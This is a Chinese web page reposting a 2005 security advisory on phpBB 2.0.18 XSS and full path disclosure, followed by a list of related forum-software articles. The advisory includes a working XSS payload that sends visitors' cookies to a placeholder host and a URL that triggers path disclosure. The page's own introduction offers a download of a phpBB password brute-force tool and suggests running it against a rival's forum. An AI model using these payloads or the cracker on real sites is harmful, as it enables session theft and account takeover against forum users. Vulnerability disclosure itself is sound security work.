phpBB论坛程序:老革命遇见新问题

phpBB 2.0.18 XSS and Full Path Disclosure

Details: SecurityAlert

还有一个是暴力破解的工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码

下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar

Topic : phpBB 2.0.18 XSS and Full Path Disclosure

SecurityAlert Id : 269

SecurityRisk : Low

Remote Exploit : Yes

Local Exploit : No

Exploit Given : Yes

Credit : Maksymilian Arciemowicz

Date : 17.12.2005

Affected Software :  phpBB <= 2.0.18

Advisory Text :

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date: 16.12.2005

from securityreason.com TEAM

- --- 0.Description ---

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar

d package. phpBB has a user-friendly interface, simple and straightforward administration

panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL

, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so

lution for all web sites.

Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS ---

If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al

low HTML: YES" or are you Guest

that you can use this tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)

" X="<B "> H A L O </B>

and have you cookies.

- --- 2. Full Path Disclosure ---

In file admin/admin_disallow.php is

- -25-31---

if( !empty($setmodules) )

{

$filename = basename(__FILE__);

$module['Users']['Disallow'] = append_sid($filename);

return;

}

- -25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On

display_errors = On

Try to go:

http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---

Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa

llow.php on line 28

- -RESULT ERROR---

- --- 3. Greets ---

sp3x

- --- 4.Contact ---

Author: Maksymilian Arciemowicz < cXIb8O3 >

Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com

GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

securityreason.com TEAM

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D

/0u14EN2sQAh1Bwu0yvT48Q=

=lsL8

-----END PGP SIGNATURE-----

哦,对了, 最上面那个好象也许大概似乎我猜是这个意思:

个性签名:

您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。

禁止HTML标签

允许风格标签

允许表情图标

找到可以“允许HTML标签”

(0)

相关推荐

  • phpBB论坛程序:老革命遇见新问题

    phpBB 2.0.18 XSS and Full Path Disclosure Details: SecurityAlert 还有一个是暴力破解的工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码 下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar Topic : phpBB 2.0.18 XSS and Full Path Disclosure SecurityAlert Id : 269 Securi

  • 国外著名论坛程序IPB(Invision Power Board)在nginx下的配置示例

    Invision Power Board (IPB)是一个论坛程序,基于php+MySQL. 虽然国内大部分都在用discuz,但是国外ipb的用户很多,今天贴出ipb的nginx配置文件.配置如下: 复制代码 代码如下: server { access_log off;  error_log logs/bbs.jb51.net-error_log warn; listen 80;  server_name bbs.jb51.net; # static file configuration  l

  • 一个模仿oso的php论坛程序源码(之三)第1/2页

    程序三:readforum.php  <HTML>  <HEAD>  <TITLE> 论坛信息 </TITLE>  <link rel="STYLESHEET" type="text/css" href="fp_zhangcg.css">  <meta http-equiv="Content-Type" content="text/html; char

  • 一个模仿oso的php论坛程序(之一)第1/2页

    我经常使用oso的论坛,个人感觉挺好的,因此模仿oso的界面编了一个程序,与大家共享.  程序由三部分组成,即显示主题信息,显示论坛信息,增加论坛信息,主题与论坛内容采用主从表关系.  表结构如下:  drop table fr_t_forumtitle;  create table fr_t_forumtitle(     id         integer,     state      varchar(1),     readcount  integer,     replycount 

  • 一个模仿oso的php论坛程序源码(之二)第1/3页

    程序二:addforum.php  <html>  <head>  <link rel="STYLESHEET" type="text/css" href="fp_zhangcg.css">  <meta http-equiv="Content-Type" content="text/html; charset=gb2312">  <meta name=

  • IP攻击升级,程序改进以对付新的攻击

    不过最近几天突然糟糕了起来,有90%的攻击已经没法拦截,请看下图一天的统计: IP攻击及开始时间 攻击次数 地点 备注 125.165.1.42--2010-11-19 02:02:19--/ 10 印度尼西亚 125.165.26.186--2010-11-19 16:56:45--/ 1846 印度尼西亚 151.51.238.254--2010-11-19 09:32:40--/ 4581 意大利 151.76.40.182--2010-11-19 11:58:37--/ 4763 意大利

  • Linux+Nginx+MySQL下配置论坛程序Discuz的基本教程

    Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统.自2001年6月面世以来,Discuz!已拥有14年以上的应用历史和200多万网站用户案例,是全球成熟度最高.覆盖率最大的论坛软件系统之一.目前最新版本Discuz! X3.2正式版于2015年6月9日发布,首次引入应用中心的开发模式.2010年8月23日,康盛创想与腾讯达成收购协议,成为腾讯的全资子公司. Crossday Discuz! Board(以下简称 D

  • MySQL针对Discuz论坛程序的基本优化教程

    过了这么久,discuz论坛的问题还是困扰着很多网友,其实从各论坛里看到的问题总结出来,很关键的一点都是因为没有将数据表引擎转成InnoDB导致的,discuz在并发稍微高一点的环境下就表现的非常糟糕,产生大量的锁等待,这时候如果把数据表引擎改成InnoDB的话,我相信会好很多.这次就写个扫盲贴吧. 1. 启用innodb引擎,并配置相关参数 #skip-innodb innodb_additional_mem_pool_size = 16M #一般16M也够了,可以适当调整下 innodb_b

  • Discuz! 5.0.0论坛程序中加入一段js代码,让会员点击下载附件前自动弹出提示窗口

    你需要修改attachment.php文件 在根目录下  在$attachexists = $ispaid = FALSE;下面添加  if (!empty($checktwo)) {  在最末尾的?>前添加  } else {  echo "<script>alert('写上你要提示的内容')</script>";  echo "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0

  • 交换机网络安全策略全方位解析

    [交换机网络安全策略全方位解析] 交换机在企业网中占有重要的地位,通常是整个网络的核心所在.在这个黑客入侵风起云涌.病毒肆虐的网络时代,作为核心的交换机也理所当然要承担起网络安全的一部分责任. 因此,交换机要有专业安全产品的性能,安全已经成为网络建设必须考虑的重中之中.安全交换机由此应运而生,在交换机中集成安全认证.ACL(Access Control List,访问控制列表).防火墙.入侵检测甚至防毒的功能,网络的安全真的需要"武装到牙齿". 安全交换机三层含义 交换机最重要的作用就

随机推荐